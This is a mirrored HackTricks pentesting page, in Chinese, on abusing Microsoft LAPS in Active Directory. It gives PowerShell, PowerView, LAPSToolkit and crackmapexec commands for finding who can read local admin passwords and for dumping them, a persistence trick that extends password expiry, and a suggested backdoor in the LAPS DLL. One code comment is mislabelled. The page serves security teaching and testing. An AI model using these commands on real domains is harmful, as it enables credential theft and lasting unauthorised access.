mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 16:39:32 +00:00
135 lines
9 KiB
Markdown
135 lines
9 KiB
Markdown
# LAPS
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* 你在一个**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
|
||
|
||
</details>
|
||
|
||
## 基本信息
|
||
|
||
**LAPS**允许您在加入域的计算机上**管理本地管理员密码**(该密码是**随机的**、唯一的,并且**定期更改**)。这些密码在Active Directory中进行集中存储,并使用ACLs限制授权用户。密码在客户端到服务器的传输中使用Kerberos v5和AES进行保护。
|
||
|
||
使用LAPS时,域中的**计算机对象**中会出现**2个新属性**:**`ms-mcs-AdmPwd`**和**`ms-mcs-AdmPwdExpirationTime`**。这些属性包含**明文管理员密码和过期时间**。因此,在域环境中,检查**哪些用户可以读取**这些属性可能是有趣的。
|
||
|
||
### 检查是否已激活
|
||
```bash
|
||
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
|
||
|
||
dir "C:\Program Files\LAPS\CSE"
|
||
# Check if that folder exists and contains AdmPwd.dll
|
||
|
||
# Find GPOs that have "LAPS" or some other descriptive term in the name
|
||
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
|
||
|
||
# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
|
||
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
|
||
```
|
||
### LAPS密码访问
|
||
|
||
您可以从`\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol`下载原始的LAPS策略文件,然后使用[**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser)软件包中的**`Parse-PolFile`**将该文件转换为可读的格式。
|
||
|
||
此外,如果我们可以访问的机器上安装了**本机LAPS PowerShell cmdlets**,我们也可以使用它们:
|
||
```powershell
|
||
Get-Command *AdmPwd*
|
||
|
||
CommandType Name Version Source
|
||
----------- ---- ------- ------
|
||
Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS
|
||
Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS
|
||
Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS
|
||
Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS
|
||
Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS
|
||
Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS
|
||
Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS
|
||
Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS
|
||
|
||
# List who can read LAPS password of the given OU
|
||
Find-AdmPwdExtendedRights -Identity Workstations | fl
|
||
|
||
# Read the password
|
||
Get-AdmPwdPassword -ComputerName wkstn-2 | fl
|
||
```
|
||
**PowerView** 也可以用来查找**谁可以读取密码并读取它**:
|
||
```powershell
|
||
# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
|
||
Get-AdmPwdPassword -ComputerName wkstn-2 | fl
|
||
|
||
# Read the password
|
||
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
|
||
```
|
||
### LAPSToolkit
|
||
|
||
[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit)是一个工具包,用于枚举启用了LAPS的计算机。它具有多个功能。\
|
||
其中之一是解析**所有启用了LAPS的计算机的ExtendedRights**。这将显示**专门被授权读取LAPS密码的组**,通常是受保护组中的用户。\
|
||
加入计算机到域的**账户**会在该主机上获得`All Extended Rights`,这个权限赋予了该**账户读取密码**的能力。枚举可能会显示一个可以在主机上读取LAPS密码的用户账户。这可以帮助我们**针对特定的AD用户**,他们可以读取LAPS密码。
|
||
```powershell
|
||
# Get groups that can read passwords
|
||
Find-LAPSDelegatedGroups
|
||
|
||
OrgUnit Delegated Groups
|
||
------- ----------------
|
||
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain Admins
|
||
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin
|
||
|
||
# Checks the rights on each computer with LAPS enabled for any groups
|
||
# with read access and users with "All Extended Rights"
|
||
Find-AdmPwdExtendedRights
|
||
ComputerName Identity Reason
|
||
------------ -------- ------
|
||
MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins Delegated
|
||
MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated
|
||
|
||
# Get computers with LAPS enabled, expirations time and the password (if you have access)
|
||
Get-LAPSComputers
|
||
ComputerName Password Expiration
|
||
------------ -------- ----------
|
||
DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41
|
||
```
|
||
## **使用Crackmapexec倾泻LAPS密码**
|
||
如果没有访问powershell的权限,您可以通过LDAP远程滥用此特权,方法是使用
|
||
```
|
||
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
|
||
```
|
||
这将导出用户可以读取的所有密码,使您能够以不同的用户获得更好的立足点。
|
||
|
||
## **LAPS持久性**
|
||
|
||
### **过期日期**
|
||
|
||
一旦成为管理员,可以通过将过期日期设置为未来来获得密码并阻止机器更新密码。
|
||
```powershell
|
||
# Get expiration time
|
||
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
|
||
|
||
# Change expiration time
|
||
## It's needed SYSTEM on the computer
|
||
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
|
||
```
|
||
{% hint style="warning" %}
|
||
如果**管理员**使用**`Reset-AdmPwdPassword`**命令或启用了LAPS GPO中的**不允许密码过期时间超过策略要求**选项,密码仍然会被重置。
|
||
{% endhint %}
|
||
|
||
### 后门
|
||
|
||
LAPS的原始源代码可以在[这里](https://github.com/GreyCorbel/admpwd)找到,因此可以在代码中(例如在`Main/AdmPwd.PS/Main.cs`的`Get-AdmPwdPassword`方法中)放置一个后门,以某种方式**窃取新密码或将其存储在其他地方**。
|
||
|
||
然后,只需编译新的`AdmPwd.PS.dll`并将其上传到机器的`C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll`(并更改修改时间)。
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* 你在一家**网络安全公司**工作吗?想要在HackTricks中**宣传你的公司**吗?或者想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 发现我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
|
||
|
||
</details>
|